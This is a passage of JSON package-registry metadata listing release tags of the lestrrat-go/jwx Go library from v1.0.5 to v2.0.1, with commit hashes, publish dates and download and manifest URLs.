ps://github.com/lestrrat-go/jwx/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1/manifests"},{"name":"v1.2.24","sha":"e38f677839edbeae5480e993d73eacb94f7af581","kind":"commit","published_at":"2022-05-05T01:00:31.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.24","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24/manifests"},{"name":"v2.0.0","sha":"8f97f606570bc3de90005ce3188824e7e7eff88a","kind":"commit","published_at":"2022-04-24T04:18:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0/manifests"},{"name":"v2.0.0-beta2","sha":"fd8fafc9fe0a7310d9dec456168a452d571c16b0","kind":"commit","published_at":"2022-04-16T06:50:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2/manifests"},{"name":"v1.2.23","sha":"baba5610e7fb53402e23c955edc10dbb25d73275","kind":"commit","published_at":"2022-04-13T09:52:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.23","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23/manifests"},{"name":"v2.0.0-beta1","sha":"0258045345942aed8b8694da94cfb5ab4dd3261c","kind":"commit","published_at":"2022-04-09T13:16:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1/manifests"},{"name":"v1.2.22","sha":"f4701e19d38b7fd1ede0ef785867e078016b516e","kind":"commit","published_at":"2022-04-08T11:18:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.22","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22/manifests"},{"name":"v2.0.0-alpha1","sha":"8a69aa2dd6b9a7a8284584cdd23acd96613c0866","kind":"commit","published_at":"2022-04-03T23:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1/manifests"},{"name":"v1.2.21","sha":"7b28f4c7fabe44249b77e058e5ca33c82b599d5e","kind":"commit","published_at":"2022-03-29T22:49:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21/manifests"},{"name":"v1.2.20","sha":"3fa12c9bedcebd03db23f61cfb65ae0b040bf211","kind":"commit","published_at":"2022-03-03T05:56:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20/manifests"},{"name":"v1.2.19","sha":"1c0a87feccf45c59a54ee3c9f2a995ab777953e7","kind":"commit","published_at":"2022-02-22T01:40:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19/manifests"},{"name":"v1.2.18","sha":"2ab72de258ac966aeec3cfb836209692ed345586","kind":"commit","published_at":"2022-01-23T00:22:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18/manifests"},{"name":"v1.2.17","sha":"300b79a15b99559ba7ad22e4275ecc99a07c359b","kind":"commit","published_at":"2022-01-12T10:10:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17/manifests"},{"name":"v1.2.16","sha":"9349cc843391834794d593c4daa1345de1ab357e","kind":"commit","published_at":"2022-01-12T05:29:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16/manifests"},{"name":"v1.2.15","sha":"5ded25fd0bf8f759a96a7ae3937df829d8e4777d","kind":"commit","published_at":"2022-01-06T23:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15/manifests"},{"name":"v1.2.14","sha":"de7d9bca43812abc4f630320f8632108ccfe34bf","kind":"commit","published_at":"2021-12-22T01:34:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14/manifests"},{"name":"v1.2.13","sha":"59f4c03c3e0aeb44f6b6a57fd96b90f9a679f880","kind":"commit","published_at":"2021-12-07T02:59:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13/manifests"},{"name":"v1.2.12","sha":"45e532bbe4ada174b16f5f170ea62d2c8d83ef77","kind":"commit","published_at":"2021-12-01T06:52:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12/manifests"},{"name":"v1.2.11","sha":"e371adc10f659fa05b064274ff549a8e0353d2b6","kind":"commit","published_at":"2021-11-13T15:34:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11/manifests"},{"name":"v1.2.10","sha":"09a4d070eb0ec840a33597a67a17e6cddb53da87","kind":"commit","published_at":"2021-11-09T09:16:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10/manifests"},{"name":"v1.2.9","sha":"b2da2238b7b342a8889470b901ef3024dfc0712a","kind":"commit","published_at":"2021-10-26T01:00:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9/manifests"},{"name":"v1.2.8","sha":"f2bdd8c9df46d61fe987fa36bcc87c58ef846046","kind":"commit","published_at":"2021-10-21T01:23:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8/manifests"},{"name":"v1.2.7","sha":"b9292016a6572dce779109d8da8d813b85abb658","kind":"commit","published_at":"2021-09-26T06:08:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7/manifests"},{"name":"v1.2.6","sha":"41b30b67e905482292496e528119fc7482482ab3","kind":"commit","published_at":"2021-08-24T07:56:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6/manifests"},{"name":"v1.2.5","sha":"551083cda79fd07493bf0db6e825278dd88c1fc3","kind":"commit","published_at":"2021-08-04T12:17:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5/manifests"},{"name":"v1.2.4","sha":"d01528f5e5ae3221a48f67570928867e98184bbd","kind":"commit","published_at":"2021-07-15T13:26:23.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4/manifests"},{"name":"v1.2.3","sha":"5e2de6ea11b5112bdf1a5e088d56c9c2e7fb6807","kind":"commit","published_at":"2021-07-15T09:53:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3/manifests"},{"name":"v1.2.2","sha":"7159c501c5a43f8788f3a9a0961e146480c28eae","kind":"commit","published_at":"2021-07-12T23:38:00.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2/manifests"},{"name":"v1.2.1","sha":"08de34253bc9633a11b019b143a2d212f8ff0ed8","kind":"commit","published_at":"2021-06-01T23:24:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"20fcd2aaea33121a0da375914a254615b3527c46","kind":"commit","published_at":"2021-04-29T23:40:49.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0/manifests"},{"name":"v1.1.8-rc1","sha":"4fc7156e9562e4b51143220e830ed2d32279d2f6","kind":"commit","published_at":"2021-04-08T12:05:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.8-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.8-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.8-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1/manifests"},{"name":"v1.1.7","sha":"db72eadbbe21fa7dc37d5628acfaa803fbf7d96e","kind":"commit","published_at":"2021-04-02T13:09:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7/manifests"},{"name":"v1.1.7-rc1","sha":"afd2d647f5892a70ab72ee14e9985ab5028bfb23","kind":"commit","published_at":"2021-03-31T06:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1/manifests"},{"name":"v1.1.6","sha":"df21963ac28051061a86f9c0e9671800312e6f18","kind":"commit","published_at":"2021-03-28T07:55:51.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"b2a7484c0e863f2730d3a7a79ade1deed9e85e13","kind":"commit","published_at":"2021-03-12T04:23:47.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5/manifests"},{"name":"v1.1.5-rc1","sha":"c9a7b177e98db06f4fcd57b90ddaeab8d436e0a9","kind":"commit","published_at":"2021-03-02T22:19:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1/manifests"},{"name":"v1.1.4","sha":"db48a5c54e2bf7d069a170de798d6bc914dae96d","kind":"commit","published_at":"2021-03-01T21:47:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"a7162536a2a50e66cc69bab0e4deb403e3f1fdc0","kind":"commit","published_at":"2021-02-22T08:42:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"a7f076fc6eadb44380d41b5e30eb5a85a91de864","kind":"commit","published_at":"2021-02-16T10:05:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"451a45cc212f752fa0011e64d8042ec87f0762df","kind":"commit","published_at":"2021-02-05T02:01:14.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"7f69ac971a6fd1cff28abadfe1e654f33004a19a","kind":"commit","published_at":"2021-01-31T07:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0/manifests"},{"name":"v1.0.8","sha":"3bb9a18ceb5f45ffc4d0b837f85a5c3eb3f0bbfe","kind":"commit","published_at":"2021-01-14T23:41:30.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8/manifests"},{"name":"v1.0.7","sha":"36d0cd5770ba08f66232bc143fd26856c258f27b","kind":"commit","published_at":"2021-01-11T10:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7/manifests"},{"name":"v1.0.6","sha":"d4cb6651f457177451df330a37eaa0af4c7476a0","kind":"commit","published_at":"2020-12-16T21:36:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6/manifests"},{"name":"v1.0.5","sha":"5aeabd78da3bab07a0ae04d299575f967590380e","kind":"commit","published_at":"2020-09-28T08:03:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5"